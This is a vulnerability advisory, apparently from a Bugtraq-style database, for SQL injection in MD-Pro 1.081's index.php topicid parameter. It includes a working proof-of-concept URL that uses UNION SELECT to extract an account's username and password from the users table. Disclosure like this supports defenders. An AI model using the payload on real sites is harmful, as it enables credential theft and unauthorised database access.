MD-Pro Index.PHP TopicID SQL Injection Vulnerability
BID:24969
Info
MD-Pro Index.PHP TopicID SQL Injection Vulnerability
| Bugtraq ID: | 24969 |
| Class: | Input Validation Error |
| CVE: |
CVE-2007-3938 |
| Remote: | Yes |
| Local: | No |
| Published: | Jul 19 2007 12:00AM |
| Updated: | May 07 2015 05:36PM |
| Credit: | The discoverer of this issue is currently unknown. |
| Vulnerable: |
MAXdev MD-Pro 1.081 |
| Not Vulnerable: | |
Discussion
MD-Pro Index.PHP TopicID SQL Injection Vulnerability
MD-Pro is prone to an SQL-injection vulnerability because the application fails to properly sanitize user-supplied input before using it in an SQL query.
A successful exploit could allow an attacker to compromise the application, access or modify data, or exploit vulnerabilities in the underlying database.
MD-Pro 1.081 is vulnerable to this issue; other versions may also be affected.
MD-Pro is prone to an SQL-injection vulnerability because the application fails to properly sanitize user-supplied input before using it in an SQL query.
A successful exploit could allow an attacker to compromise the application, access or modify data, or exploit vulnerabilities in the underlying database.
MD-Pro 1.081 is vulnerable to this issue; other versions may also be affected.
Exploit / POC
MD-Pro Index.PHP TopicID SQL Injection Vulnerability
Attackers can exploit this issue via a browser.
The following URI is sufficient to demonstrate this issue:
http://www.example.com/[mdpro_path]/index.php?module=Topics&func=view&topicid=-1 UNION ALL SELECT null,null,concat(pn_uname,0x3a,pn_pass),null,null,null,null from md_users where pn_uid=2/*
Attackers can exploit this issue via a browser.
The following URI is sufficient to demonstrate this issue:
http://www.example.com/[mdpro_path]/index.php?module=Topics&func=view&topicid=-1 UNION ALL SELECT null,null,concat(pn_uname,0x3a,pn_pass),null,null,null,null from md_users where pn_uid=2/*
Solution / Fix
MD-Pro Index.PHP TopicID SQL Injection Vulnerability
Solution:
Currently we are not aware of any vendor-supplied patches for this issue. If you feel we are in error or if you are aware of more recent information, please mail us at: [email protected].
Solution:
Currently we are not aware of any vendor-supplied patches for this issue. If you feel we are in error or if you are aware of more recent information, please mail us at: [email protected].